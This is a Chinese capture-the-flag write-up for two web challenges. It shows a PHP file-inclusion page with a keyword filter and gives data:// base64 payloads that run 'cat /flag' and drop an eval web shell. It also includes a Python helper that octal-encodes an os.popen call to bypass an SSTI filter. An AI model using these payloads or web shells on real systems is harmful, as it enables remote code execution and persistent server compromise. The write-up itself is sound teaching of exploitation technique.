WEB
Include Me
知识点:PHP伪协议,文件包含
<?php
highlight_file(__FILE__);
function waf(){
if(preg_match("/<|\?|php|>|echo|filter|flag|system|file|%|&|=|`|eval/i",$_GET['me'])){
die("兄弟你别包");
};
}
if(isset($_GET['phpinfo'])){
phpinfo();
}
//兄弟你知道了吗?
if(!isset($_GET['iknow'])){
header("Refresh: 5;url=https://cn.bing.com/search?q=php%E4%BC%AA%E5%8D%8F%E8%AE%AE");
}
waf();
include $_GET['me'];
echo "兄弟你好香";
?>
1、利用data协议直接读flag
<?php system('cat /flag');?>
iknow=1&me=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg
2、利用data协议生成shell文件,提交前生成进行url编码,=号可去掉
<?php @eval($_POST['cmd']);?>
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=
<?php file_put_contents('shell3.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4='));?>
PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsMy5waHAnLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFnUUdWMllXd29KRjlRVDFOVVd5ZGpiV1FuWFNrN1B6ND0nKSk7Pz4
臭皮的计算机
知识点:ssti,八进制绕过
生成八进制编码绕过
def string_to_octal_escape(input_string):
octal_escape = ''.join(f'\\{ord(char):03o}' for char in input_string)
return octal_escape
# 示例
input_string = "__import__('os').popen('cat /flag').read()"
octal_escape_string = string_to_octal_escape(input_string)
print(f"字符串 '{input_string}' 的八进制转义表示为: {octal_escape_string}")
# 字符串 '__import__('os').popen('cat /flag').read()' 的八进制转义表示为:
# \137\137\151\155\160\157\162\164\137\137\050\047\157\163\047\051\056\160\157\160\145\156\050\047\143\141\164\040\057\146\154\141\147\047\051\056\162\145\141\144\050\051